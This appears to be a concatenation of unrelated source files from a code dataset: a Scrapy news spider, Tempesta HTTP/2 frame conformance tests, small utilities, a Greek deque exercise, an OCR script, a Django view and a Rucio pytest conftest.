                        root = root.replace(py_dir, '').replace('/', '.').replace('\\', '.')
                        print root, name
                        log_f.write(str(root) + str(name) + '\n')
                        if root:
                            __import__('apps.' + root, globals(), locals(), [name], -1)
                        else:
                            __import__('apps.' + name, globals(), locals(), [], -1)
        log_f.close()
    except:
        # NOTE(review): the bare except also swallows KeyboardInterrupt /
        # SystemExit; the traceback is logged and the walk is abandoned.
        err_info = traceback.format_exc()
        print err_info
        log_f.write(err_info+ '\n')
        log_f.close()
if __name__ == '__main__':
run_dir(settings.BASE_ROOT+'/apps/')
|
5,660 | d307c3479e34a12971f62a765aca2ba0850d80d1 | import scrapy
import datetime
from tzscrape.items import CitizenItem
class CitizenSpider(scrapy.Spider):
    """Crawl the thecitizen.co.tz front page and scrape linked articles."""
    name = 'citizen'
    allowed_domains = ['thecitizen.co.tz']
    start_urls = ['http://www.thecitizen.co.tz/']

    def parse(self, response):
        """Follow every headline and teaser link to parse_article."""
        # headlines
        for href in response.xpath('//*[@itemprop="headline"]/a/@href'):
            url = response.urljoin(href.extract())
            yield scrapy.Request(url, callback=self.parse_article)
        #teasers
        for href in response.css('li.story-teaser').xpath('a/@href[1]'):
            url = response.urljoin(href.extract())
            yield scrapy.Request(url, callback=self.parse_article)

    def parse_article(self, response):
        """Extract one article into a CitizenItem.

        Yields None when the article-body selector matches nothing (the
        remaining fields are then never filled in).
        """
        item = CitizenItem()
        item['body'] = response.xpath('//div[@itemprop="articleBody"]/div/p//text()').extract()
        if not item['body']:
            yield None
        else :
            item['url'] = response.url
            item['publication'] = 'citizen'
            item['title'] = response.css('h1').xpath('text()').extract()
            item['byline'] = response.css('section.author').xpath('text()').extract()
            item['scraped_at'] = datetime.datetime.utcnow().isoformat()
            yield item
5,661 | e474cb3db74b5344bd861aacf779cb9f77830ef6 | """Functional tests for h2 frames."""
__author__ = "Tempesta Technologies, Inc."
__copyright__ = "Copyright (C) 2023 Tempesta Technologies, Inc."
__license__ = "GPL2"
from h2.errors import ErrorCodes
from h2.exceptions import StreamClosedError
from framework import deproxy_client, tester
from helpers import checks_for_tests as checks
from http2_general.helpers import H2Base
from helpers.networker import NetWorker
from hpack import HeaderTuple
class TestH2Frame(H2Base):
    """Per-frame-type HTTP/2 functional tests against Tempesta:
    DATA, SETTINGS, WINDOW_UPDATE, CONTINUATION, RST_STREAM, GOAWAY, HEADERS."""
    def test_data_framing(self):
        """Send many 1 byte frames in request."""
        self.start_all_services()
        deproxy_cl = self.get_client("deproxy")
        deproxy_cl.parsing = False
        request_body = "x" * 100
        deproxy_cl.make_request(request=self.post_request, end_stream=False)
        # Each character becomes its own 1-byte DATA frame.
        for byte in request_body[:-1]:
            deproxy_cl.make_request(request=byte, end_stream=False)
        deproxy_cl.make_request(request=request_body[-1], end_stream=True)
        self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)
    def test_empty_last_data_frame(self):
        """
        Send request with empty last data frame. It is valid request. RFC 9113 6.9.1.
        """
        self.start_all_services()
        deproxy_cl = self.get_client("deproxy")
        deproxy_cl.parsing = False
        request_body = "123"
        deproxy_cl.make_request(request=self.post_request, end_stream=False)
        deproxy_cl.make_request(request=request_body, end_stream=False)
        deproxy_cl.make_request(request="", end_stream=True)
        self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)
    def test_empty_data_frame(self):
        """
        Send request with empty data frame. It is valid request. RFC 9113 10.5.
        """
        self.start_all_services()
        deproxy_cl = self.get_client("deproxy")
        deproxy_cl.parsing = False
        request_body = "123"
        deproxy_cl.make_request(request=self.post_request, end_stream=False)
        deproxy_cl.make_request(request="", end_stream=False)
        deproxy_cl.make_request(request=request_body, end_stream=True)
        self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)
    def test_settings_frame(self):
        """
        Create tls connection and send preamble + correct settings frame.
        Tempesta must accept settings and return settings + ack settings frames.
        Then client send ack settings frame and Tempesta must correctly accept it.
        """
        self.start_all_services(client=True)
        client: deproxy_client.DeproxyClientH2 = self.get_client("deproxy")
        # initiate_connection() generates preamble + settings frame with default variables
        self.initiate_h2_connection(client)
        # send empty setting frame with ack flag.
        client.send_bytes(client.h2_connection.data_to_send())
        client.h2_connection.clear_outbound_data_buffer()
        # send header frame after exchanging settings and make sure
        # that connection is open.
        client.send_request(self.post_request, "200")
    def test_window_update_frame(self):
        """Tempesta must handle WindowUpdate frame."""
        self.start_all_services(client=True)
        client: deproxy_client.DeproxyClientH2 = self.get_client("deproxy")
        # add preamble + settings frame with SETTING_INITIAL_WINDOW_SIZE = 65535
        client.update_initial_settings()
        # send preamble + settings frame
        client.send_bytes(client.h2_connection.data_to_send())
        client.h2_connection.clear_outbound_data_buffer()
        self.assertTrue(client.wait_for_ack_settings())
        # send WindowUpdate frame with window size increment = 5000
        client.h2_connection.increment_flow_control_window(5000)
        client.send_bytes(client.h2_connection.data_to_send())
        client.h2_connection.clear_outbound_data_buffer()
        # send header frame after sending WindowUpdate and make sure
        # that connection is working correctly.
        client.send_request(self.get_request, "200")
        self.assertFalse(client.connection_is_closed())
    def test_continuation_frame(self):
        """Tempesta must handle CONTINUATION frame."""
        self.start_all_services()
        client: deproxy_client.DeproxyClientH2 = self.get_client("deproxy")
        client.update_initial_settings()
        client.send_bytes(client.h2_connection.data_to_send())
        client.h2_connection.clear_outbound_data_buffer()
        # H2Connection separates headers to HEADERS + CONTINUATION frames
        # if they are larger than 16384 bytes
        client.send_request(
            request=self.get_request + [("qwerty", "x" * 5000) for _ in range(4)],
            expected_status_code="200",
        )
        self.assertFalse(client.connection_is_closed())
    def test_rst_frame_in_request(self):
        """
        Tempesta must handle RST_STREAM frame and close stream but other streams MUST work.
        """
        client = self.get_client("deproxy")
        self.start_all_services()
        self.initiate_h2_connection(client)
        # client opens streams with id 1, 3 and does not close them
        client.make_request(request=self.post_request, end_stream=False)
        client.stream_id = 3
        client.make_request(request=self.post_request, end_stream=False)
        # client send RST_STREAM frame with NO_ERROR code in stream 1 and
        # Tempesta closes it for itself.
        client.h2_connection.reset_stream(stream_id=1, error_code=0)
        client.send_bytes(client.h2_connection.data_to_send())
        # Client send DATA frame in stream 3 and it MUST receive response
        client.send_request("qwe", "200")
        # Tempesta allows creating new streams.
        client.stream_id = 5
        client.send_request(self.post_request, "200")
        self.assertFalse(
            client.connection_is_closed(), "Tempesta closed connection after receiving RST_STREAM."
        )
    def test_rst_frame_in_response(self):
        """
        When Tempesta returns RST_STREAM:
            - open streams must not be closed;
            - new streams must be accepted.
        """
        client = self.get_client("deproxy")
        client.parsing = False
        self.start_all_services()
        self.initiate_h2_connection(client)
        # client opens stream with id 1 and does not close it
        client.make_request(request=self.post_request, end_stream=False)
        # client send invalid request and Tempesta returns RST_STREAM
        stream_with_rst = 3
        client.stream_id = stream_with_rst
        client.send_request(self.get_request + [("x-forwarded-for", "1.1.1.1.1.1")], "400")
        # client open new stream
        client.make_request(self.get_request, end_stream=True)
        client.wait_for_response(3)
        # client send DATA frame in stream 1 and it must be open.
        client.stream_id = 1
        client.make_request("body", end_stream=True)
        client.wait_for_response(3)
        # The reset stream is gone on the client's h2 state machine too.
        self.assertRaises(
            StreamClosedError, client.h2_connection._get_stream_by_id, stream_with_rst
        )
        self.assertFalse(
            client.connection_is_closed(), "Tempesta closed connection after sending RST_STREAM."
        )
    def test_rst_stream_with_id_0(self):
        """
        RST_STREAM frames MUST be associated with a stream. If a RST_STREAM frame
        is received with a stream identifier of 0x00, the recipient MUST treat this
        as a connection error (Section 5.4.1) of type PROTOCOL_ERROR.
        RFC 9113 6.4
        """
        client = self.get_client("deproxy")
        self.start_all_services()
        self.initiate_h2_connection(client)
        # send RST_STREAM with id 0 (raw bytes: length 4, type 0x03, stream 0)
        client.send_bytes(b"\x00\x00\x04\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00")
        self.assertTrue(
            client.wait_for_connection_close(1),
            "Tempesta did not close connection after receiving RST_STREAM with id 0.",
        )
        self.assertIn(ErrorCodes.PROTOCOL_ERROR, client.error_codes)
    def test_goaway_frame_in_response(self):
        """
        Tempesta must:
            - close all streams for connection error (GOAWAY);
            - return last_stream_id.
        There is an inherent race condition between an endpoint starting new streams
        and the remote peer sending a GOAWAY frame. To deal with this case, the GOAWAY
        contains the stream identifier of the last peer-initiated stream that was or
        might be processed on the sending endpoint in this connection. For instance,
        if the server sends a GOAWAY frame, the identified stream is the highest-numbered
        stream initiated by the client.
        RFC 9113 6.8
        """
        client = self.get_client("deproxy")
        self.start_all_services()
        self.initiate_h2_connection(client)
        # Client opens many streams and does not close them
        for stream_id in range(1, 6, 2):
            client.stream_id = stream_id
            client.make_request(request=self.post_request, end_stream=False)
        # Client send DATA frame with stream id 0.
        # Tempesta MUST return GOAWAY frame with PROTOCOL_ERROR
        client.send_bytes(b"\x00\x00\x03\x00\x01\x00\x00\x00\x00asd")
        self.assertTrue(client.wait_for_connection_close(3), "Tempesta did not send GOAWAY frame.")
        self.assertIn(ErrorCodes.PROTOCOL_ERROR, client.error_codes)
        # stream_id is 5 here - the highest stream opened by the loop above.
        self.assertEqual(
            client.last_stream_id,
            stream_id,
            "Tempesta returned invalid last_stream_id in GOAWAY frame.",
        )
    def test_goaway_frame_in_request(self):
        """
        Tempesta must not close connection after receiving GOAWAY frame.
        GOAWAY allows an endpoint to gracefully stop accepting new streams while still
        finishing processing of previously established streams.
        RFC 9113 6.8
        """
        client = self.get_client("deproxy")
        self.start_all_services()
        self.initiate_h2_connection(client)
        # Client opens many streams and does not close them
        for stream_id in range(1, 6, 2):
            client.stream_id = stream_id
            client.make_request(request=self.post_request, end_stream=False)
        # Client send GOAWAY frame with PROTOCOL_ERROR as bytes
        # because `_terminate_connection` method changes state machine to closed
        client.send_bytes(b"\x00\x00\x08\x07\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01")
        # Client sends frames in already open streams.
        # Tempesta must handle these frames and must not close streams,
        # because sender closes connection, but not receiver.
        for stream_id in range(1, 6, 2):
            client.stream_id = stream_id
            client.make_request(request="asd", end_stream=True)
        self.assertTrue(
            client.wait_for_response(), "Tempesta closed connection after receiving GOAWAY frame."
        )
    def test_double_header_frame_in_single_stream(self):
        # A second HEADERS frame on a stream whose header section is already
        # complete must be treated as a connection error (PROTOCOL_ERROR).
        client = self.get_client("deproxy")
        self.start_all_services()
        self.initiate_h2_connection(client)
        client.make_request(self.post_request, end_stream=False)
        client.make_request([("header1", "header value1")], end_stream=True)
        self.assertTrue(client.wait_for_connection_close())
        self.assertIn(ErrorCodes.PROTOCOL_ERROR, client.error_codes)
    def __assert_test(self, client, request_body: str, request_number: int):
        """Check the response, Tempesta's request/response counters and that
        the request Tempesta forwarded to the backend is well-formed."""
        server = self.get_server("deproxy")
        self.assertTrue(client.wait_for_response(timeout=5))
        self.assertEqual(client.last_response.status, "200")
        self.assertEqual(len(server.requests), request_number)
        checks.check_tempesta_request_and_response_stats(
            tempesta=self.get_tempesta(),
            cl_msg_received=request_number,
            cl_msg_forwarded=request_number,
            srv_msg_received=request_number,
            srv_msg_forwarded=request_number,
        )
        error_msg = "Malformed request from Tempesta."
        self.assertEqual(server.last_request.method, self.post_request[3][1], error_msg)
        self.assertEqual(server.last_request.headers["host"], self.post_request[0][1], error_msg)
        self.assertEqual(server.last_request.uri, self.post_request[1][1], error_msg)
        self.assertEqual(server.last_request.body, request_body)
class TestH2FrameEnabledDisabledTsoGroGsoBase(H2Base):
    """Shared setup for the H2 frame tests that run with NIC TSO/GRO/GSO
    offloads toggled on and off (see NetWorker subclasses below)."""
    def setup_tests(self):
        """Start all services, exchange the h2 SETTINGS handshake
        (header_table_size=512) and return the (client, server) pair."""
        self.start_all_services()
        client = self.get_client("deproxy")
        server = self.get_server("deproxy")
        client.update_initial_settings(header_table_size=512)
        client.send_bytes(client.h2_connection.data_to_send())
        client.wait_for_ack_settings()
        return client, server
DEFAULT_MTU = 1500
class TestH2FrameEnabledDisabledTsoGroGso(TestH2FrameEnabledDisabledTsoGroGsoBase, NetWorker):
    """HEADERS/DATA frame tests executed with TSO/GRO/GSO offloads both
    disabled and enabled, at DEFAULT_MTU."""
    def test_headers_frame_with_continuation(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_with_continuation, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_with_continuation, DEFAULT_MTU
        )
    def test_headers_frame_without_continuation(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_without_continuation, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_without_continuation, DEFAULT_MTU
        )
    def test_data_frame(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(client, server, self._test_data_frame, DEFAULT_MTU)
        self.run_test_tso_gro_gso_enabled(client, server, self._test_data_frame, DEFAULT_MTU)
    def test_headers_frame_for_local_resp_invalid_req_d(self):
        # "_d" = offloads disabled.
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_for_local_resp_invalid_req, DEFAULT_MTU
        )
    def test_headers_frame_for_local_resp_invalid_req_e(self):
        # "_e" = offloads enabled.
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_for_local_resp_invalid_req, DEFAULT_MTU
        )
    def _test_headers_frame_for_local_resp_invalid_req(self, client, server):
        # ":authority: bad.com" is blocked by the http_chain -> expect 403
        # generated locally by Tempesta.
        client.send_request(
            request=[
                HeaderTuple(":authority", "bad.com"),
                HeaderTuple(":path", "/"),
                HeaderTuple(":scheme", "https"),
                HeaderTuple(":method", "GET"),
            ],
            expected_status_code="403",
        )
    def _test_data_frame(self, client, server):
        self._test_headers_data_frames(client, server, 50000, 100000)
    def _test_headers_frame_with_continuation(self, client, server):
        # 50000-byte header forces HEADERS + CONTINUATION framing.
        self._test_headers_data_frames(client, server, 50000, 0)
    def _test_headers_frame_without_continuation(self, client, server):
        self._test_headers_data_frames(client, server, 1000, 0)
    def _test_headers_data_frames(self, client, server, header_len, body_len):
        """POST through Tempesta; verify the oversized header and full body
        come back intact and the connection stays open."""
        header = ("qwerty", "x" * header_len)
        server.set_response(
            "HTTP/1.1 200 OK\r\n" + "Date: test\r\n" + "Server: debian\r\n"
            f"{header[0]}: {header[1]}\r\n"
            + f"Content-Length: {body_len}\r\n\r\n"
            + ("x" * body_len)
        )
        client.make_request(self.post_request)
        client.wait_for_response(5)
        self.assertFalse(client.connection_is_closed())
        self.assertEqual(client.last_response.status, "200", "Status code mismatch.")
        self.assertIsNotNone(client.last_response.headers.get(header[0]))
        self.assertEqual(len(client.last_response.headers.get(header[0])), len(header[1]))
        self.assertEqual(
            len(client.last_response.body), body_len, "Tempesta did not return full response body."
        )
class TestH2FrameEnabledDisabledTsoGroGsoStickyCookie(
    TestH2FrameEnabledDisabledTsoGroGsoBase, NetWorker
):
    """Sticky-cookie enforcement tests (302 challenge then 200 with cookie)
    run with TSO/GRO/GSO offloads disabled and enabled."""
    tempesta = {
        "config": """
            listen 443 proto=h2;
            srv_group default {
                server ${server_ip}:8000;
            }
            vhost v_good {
                proxy_pass default;
                sticky {
                    sticky_sessions;
                    cookie enforce;
                    secret "f00)9eR59*_/22";
                }
            }
            tls_certificate ${tempesta_workdir}/tempesta.crt;
            tls_certificate_key ${tempesta_workdir}/tempesta.key;
            tls_match_any_server_name;
            cache 1;
            cache_fulfill * *;
            block_action attack reply;
            block_action error reply;
            http_chain {
                host == "bad.com"	-> block;
                host == "example.com" -> v_good;
            }
        """
    }
    def test_headers_frame_for_local_resp_sticky_cookie_short(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_for_local_resp_sticky_cookie_short, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_for_local_resp_sticky_cookie_short, DEFAULT_MTU
        )
    def test_headers_frame_for_local_resp_sticky_cookie_long(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_for_local_resp_sticky_cookie_long, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_for_local_resp_sticky_cookie_long, DEFAULT_MTU
        )
    def _test_headers_frame_for_local_resp_sticky_cookie_short(self, client, server):
        self._test_headers_frame_for_local_resp_sticky_cookie(client, server, 1000, 0)
    def _test_headers_frame_for_local_resp_sticky_cookie_long(self, client, server):
        # Long header/body force CONTINUATION + multiple DATA frames.
        self._test_headers_frame_for_local_resp_sticky_cookie(client, server, 50000, 50000)
    def _test_headers_frame_for_local_resp_sticky_cookie(
        self, client, server, header_len, body_len
    ):
        """First request gets the 302 sticky-cookie challenge; repeating it
        with the returned cookie must yield 200."""
        header = ("qwerty", "x" * header_len)
        server.set_response(
            "HTTP/1.1 200 OK\r\n" + "Date: test\r\n" + "Server: debian\r\n"
            f"{header[0]}: {header[1]}\r\n"
            + f"Content-Length: {body_len}\r\n\r\n"
            + ("x" * body_len)
        )
        client.send_request(request=self.post_request, expected_status_code="302")
        # NOTE(review): mutates the shared self.post_request in place; the
        # matching pop() below restores it for subsequent tests.
        self.post_request.append(HeaderTuple("Cookie", client.last_response.headers["set-cookie"]))
        client.send_request(request=self.post_request, expected_status_code="200")
        self.post_request.pop()
class TestH2FrameEnabledDisabledTsoGroGsoCache(TestH2FrameEnabledDisabledTsoGroGsoBase, NetWorker):
    """Cache responses (200 from cache vs 304 not-modified) tested with
    TSO/GRO/GSO offloads disabled and enabled."""
    tempesta = {
        "config": """
            listen 443 proto=h2;
            srv_group default {
                server ${server_ip}:8000;
            }
            vhost v_good {
                proxy_pass default;
            }
            tls_certificate ${tempesta_workdir}/tempesta.crt;
            tls_certificate_key ${tempesta_workdir}/tempesta.key;
            tls_match_any_server_name;
            cache 1;
            cache_fulfill * *;
            cache_methods GET;
            block_action attack reply;
            block_action error reply;
            http_chain {
                host == "bad.com"	-> block;
                host == "example.com" -> v_good;
            }
        """
    }
    def test_headers_frame_for_local_resp_cache_304_short(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_for_local_resp_cache_304_short, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_for_local_resp_cache_304_short, DEFAULT_MTU
        )
    def test_headers_frame_for_local_resp_cache_200_short(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_for_local_resp_cache_200_short, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_for_local_resp_cache_200_short, DEFAULT_MTU
        )
    def test_headers_frame_for_local_resp_cache_304_long(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_for_local_resp_cache_304_long, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_for_local_resp_cache_304_long, DEFAULT_MTU
        )
    def test_headers_frame_for_local_resp_cache_200_long(self):
        client, server = self.setup_tests()
        self.run_test_tso_gro_gso_disabled(
            client, server, self._test_headers_frame_for_local_resp_cache_200_long, DEFAULT_MTU
        )
        self.run_test_tso_gro_gso_enabled(
            client, server, self._test_headers_frame_for_local_resp_cache_200_long, DEFAULT_MTU
        )
    # A far-future If-Modified-Since date yields 304; a past date yields 200.
    def _test_headers_frame_for_local_resp_cache_304_short(self, client, server):
        self._test_headers_frame_for_local_resp_cache(
            client, server, 1000, 0, "Mon, 12 Dec 2024 13:59:39 GMT", "304"
        )
    def _test_headers_frame_for_local_resp_cache_200_short(self, client, server):
        self._test_headers_frame_for_local_resp_cache(
            client, server, 1000, 0, "Mon, 12 Dec 2020 13:59:39 GMT", "200"
        )
    def _test_headers_frame_for_local_resp_cache_304_long(self, client, server):
        self._test_headers_frame_for_local_resp_cache(
            client, server, 50000, 100000, "Mon, 12 Dec 2024 13:59:39 GMT", "304"
        )
    def _test_headers_frame_for_local_resp_cache_200_long(self, client, server):
        self._test_headers_frame_for_local_resp_cache(
            client, server, 50000, 100000, "Mon, 12 Dec 2020 13:59:39 GMT", "200"
        )
    def _test_headers_frame_for_local_resp_cache(
        self, client, server, header_len, body_len, date, status_code
    ):
        """Prime the cache with a GET, then repeat it conditionally with
        If-Modified-Since=*date* and expect *status_code* from the cache."""
        header = ("qwerty", "x" * header_len)
        server.set_response(
            "HTTP/1.1 200 OK\r\n" + "Date: test\r\n" + "Server: debian\r\n"
            f"{header[0]}: {header[1]}\r\n"
            + f"Content-Length: {body_len}\r\n\r\n"
            + ("x" * body_len)
        )
        headers = [
            HeaderTuple(":authority", "example.com"),
            HeaderTuple(":path", "/"),
            HeaderTuple(":scheme", "https"),
            HeaderTuple(":method", "GET"),
        ]
        client.send_request(request=headers, expected_status_code="200")
        headers.append(HeaderTuple("if-modified-since", date))
        client.send_request(request=headers, expected_status_code=status_code)
|
5,662 | 90ae14d8af163343520365a5565a7c44de57059d | """
"""
import os
from alert_triage.util import filelock
MODIFIED_ALERTS_FILE = "/tmp/alert_triage_modified_alerts"
def read_modified_alert_ids():
    """Read modified alert IDs from file, then remove them from the file.

    Returns a list of unique int alert IDs; an empty list if the file
    does not exist.
    """
    # Return an empty list if the file doesn't exist.
    if not os.path.exists(MODIFIED_ALERTS_FILE):
        return []
    # Get a lock on the file.
    lock = filelock.FileLock(MODIFIED_ALERTS_FILE, 5)
    lock.acquire()
    # BUG FIX: the original leaked the lock and the file handle when any
    # step between acquire() and release() raised; try/finally + `with`
    # guarantee both are released.
    try:
        with open(MODIFIED_ALERTS_FILE, "r+") as fp:
            lines = fp.read().split("\n")
        # Drop empty strings, convert to int, de-duplicate.
        ids = list({int(line) for line in lines if line})
        #TODO: uncomment when live
        #os.unlink(MODIFIED_ALERTS_FILE)
    finally:
        # Release the lock.
        lock.release()
    return ids
def write_modified_alert_ids(ids):
    """Append the given alert IDs (one per line) to MODIFIED_ALERTS_FILE."""
    # Get a lock on the file.
    lock = filelock.FileLock(MODIFIED_ALERTS_FILE, 5)
    lock.acquire()
    # BUG FIX: release the lock and close the file even if the write raises.
    try:
        with open(MODIFIED_ALERTS_FILE, "a") as fp:
            for alert_id in ids:
                fp.write(str(alert_id) + "\n")
    finally:
        # Release the lock.
        lock.release()
|
5,663 | e5a7b0cbc82b57578f6dcbf676e8f589c6e9ac1b | __author__ = 'mvoronin'
|
5,664 | 87bcf53d1c93645a08b10ba0d02edf0d5b0a4906 | #Άσκηση 3.2: Ουρά δύο άκρων
# Exercise 3.2: a double-ended queue driven from stdin.
# 'q' quits, 'r' pops the last element, '0r' pops the first element,
# a plain number is appended at the end, and a number typed with a leading
# '0' (e.g. '042') is inserted at the front (the leading '0' is stripped).
print("Οδηγίες: Το πρόγραμμα καταχωρει αριθμους σε μια λίστα! Τρέχει σε άπειρο βρόχο, έως ότου πληκτρολογήσεις 'q'. \nΑν θελήσεις να βγάλεις το πρώτο στοιχείο της λίστας, πληκτρολόγησε '0r' ενώ,\nαν θέλεις να βγάλεις το τελευταιο, πληκτρολόγησε 'r'\n ")
newNumber = input("Για να ξεκινήσεις, πάτησε Enter \n")
alist = []
check = True
while check == True :
    newNumber = input("Δώσε μου τη καταχώρηση σου: ")
    if newNumber == 'q':
        print("\nΤέλος εφαρμογής!")
        check = False
    elif newNumber in ('r', '0r'):
        # BUG FIX: popping from an empty list used to raise IndexError.
        if not alist:
            print("List is empty - nothing to remove.")
        elif newNumber == 'r':
            print("\n*****Από τη λίστα βγήκε το τελευταίο στοιχειο*****", alist[len(alist) - 1])
            alist.pop()
            print(alist)
        else:
            print("\n*****Από τη λίστα βγήκε το πρώτο στοιχειο*****", alist[0])
            alist.pop(0)
            print(alist)
    else:
        # BUG FIX: empty input or non-numeric input used to crash the loop
        # (IndexError on newNumber[0] / ValueError on float()).
        try:
            if newNumber.startswith('0'):
                # Leading '0' means "insert at the front" (original quirk:
                # the '0' prefix is stripped before conversion).
                alist.insert(0, float(newNumber[1:]))
            else:
                alist.append(float(newNumber))
        except ValueError:
            print("Invalid input - enter a number, 'r', '0r' or 'q'.")
        else:
            print(alist)
# Notes:
# 1) Invalid and empty inputs are now reported instead of crashing.
# 2) The 'r'/'0r' checks stay outside the number branch so an empty list is
#    handled explicitly rather than raising IndexError.
|
5,665 | ab3d443c60ca8ee82f594ae04e9b485a53d53f36 | from ocr_helpers import FilePathResolver, ProblemsWriter
from ocr_google_client import CfaProblemsBuilder
from ocr_google_client_2016 import ParserTwoThousandSixteenAnswers, ParserTwoThousandSixteenQuestions
def resolve_build_and_write(year, day_part, file_part, nb_blocks_footer=0, nb_words_footer=0, headers=None, skip_nb_page=0, parser=None, indentation_threshold=15):
    """Resolve the scanned-page JPEGs for one exam, OCR them into problems
    and write the result XML next to the source files.

    skip_nb_page drops that many leading pages (e.g. a cover sheet);
    headers/footers describe page furniture to strip during parsing.
    """
    path_resolver = FilePathResolver(year, day_part, file_part)
    pages = path_resolver.resolve_sorted_paths()[skip_nb_page:]
    problem_builder = CfaProblemsBuilder(parser=parser, headers=headers, nb_blocks_footer=nb_blocks_footer, nb_words_footer=nb_words_footer, indentation_threshold=indentation_threshold)
    ProblemsWriter().write_problems(path_resolver.get_xml_result_file(), problem_builder.build_problems(pages))
# 2014 afternoon
# headers = ["7476229133318632 March Mock Exam - PM March Mock Exam - PM 399388"]
# resolve_build_and_write('2014', 'afternoon', 'answer', nb_blocks_footer=1, headers=headers, indentation_threshold=25)
# 2014 morning
# base_header = '3172168919041893 March Mock Exam - AM 399388'
# headers = ["|" + base_header, base_header]
# resolve_build_and_write('2014', 'morning', 'answer', nb_blocks_footer=1, headers=headers)
# 2015 afternoon
# headers = ['2015 Level I Mock Exam PM Questions and Answers']
# resolve_build_and_write('2015', 'afternoon', 'answer', nb_blocks_footer=1, headers=headers)
# 2015 morning
# headers = ['2015 Level I Mock Exam AM Questions and Answers']
# resolve_build_and_write('2015', 'morning', 'answer', nb_blocks_footer=1, headers=headers)
# 2016 afternoon answer
# headers = ['CFA level1-Mock-114']
# parser = ParserTwoThousandSixteenAnswers(17)
# resolve_build_and_write('2016', 'afternoon_answer', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
# 2016 afternoon questions
# headers = ['CFA level1-Mock-114', 'CFA levell-Mock-114']
# parser = ParserTwoThousandSixteenQuestions(17)
# resolve_build_and_write('2016', 'afternoon_question', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
#
# 2016 morning answer
# headers = ['CFA level1-Mock-113']
# parser = ParserTwoThousandSixteenAnswers(17)
# resolve_build_and_write('2016', 'morning_answer', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
# 2016 morning questions
# headers = ['CFA level1-Mock-113', 'CFA levell-Mock-113']
# parser = ParserTwoThousandSixteenQuestions(17)
# resolve_build_and_write('2016', 'morning_question', '', skip_nb_page=1, headers=headers, nb_words_footer=3, parser=parser)
# 2017 morning
#resolve_build_and_write('2017', 'morning', 'answer', skip_nb_page=1, nb_blocks_footer=2)
# 2017 afternoon
resolve_build_and_write('2017', 'afternoon', 'answer', skip_nb_page=1, nb_blocks_footer=2)
|
5,666 | 6d2bc28e7742f1063a04ae96fc195515ad70598b | from django.shortcuts import render
class Person(object):
    """Simple value object exposing a username for template rendering."""

    def __init__(self, username):
        # Publicly readable attribute, accessed in templates as person.username.
        self.username = username
def index(request):
    """Render index.html with a tuple of hero names under the 'persons' key.

    Cleanup: removed the commented-out experiments (single Person object /
    nested dict contexts) that were left over from earlier iterations.
    """
    context = {
        'persons': (
            '鲁班一号',
            '程咬金',
            '阿珂'
        )
    }
    return render(request, 'index.html', context=context)
5,667 | eb1737ac671129ed3459ce4feacb81d414eef371 | # -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import traceback
import re
import functools
from os import environ
from random import choice
from string import ascii_uppercase
import pytest
_del_test_prefix = functools.partial(re.compile(r'^[Tt][Ee][Ss][Tt]_?').sub, '')
# local imports in the fixtures to make this file loadable in e.g. client tests
pytest_plugins = ('tests.ruciopytest.artifacts_plugin', )
def pytest_configure(config):
    """Register the project's custom markers and, when running under xdist,
    the noparallel scheduler plugin."""
    config.addinivalue_line('markers', 'dirty: marks test as dirty, i.e. tests are leaving structures behind')
    config.addinivalue_line(
        'markers',
        'noparallel(reason, groups): marks test being unable to run in parallel to other tests',
    )
    if config.pluginmanager.hasplugin("xdist"):
        from .ruciopytest import xdist_noparallel_scheduler
        config.pluginmanager.register(xdist_noparallel_scheduler)
def pytest_make_parametrize_id(config, val, argname):
    """Build a readable parametrize ID for the config-mock fixtures.

    For 'file_config_mock' and 'core_config_mock' the (section, option,
    value) triples are folded into a nested dict and appended to the
    argname; for anything else return None so pytest formats the ID.

    Cleanup: the two branches were exact duplicates apart from the key
    they read ('overrides' vs 'table_content'); they are unified here.
    """
    key_by_argname = {
        'file_config_mock': 'overrides',
        'core_config_mock': 'table_content',
    }
    key = key_by_argname.get(argname)
    if key is not None:
        cfg = {}
        for section, option, value in val[key]:
            cfg.setdefault(section, {})[option] = value
        return argname + str(cfg)
    # return None to let pytest handle the formatting
    return None
@pytest.fixture(scope='session')
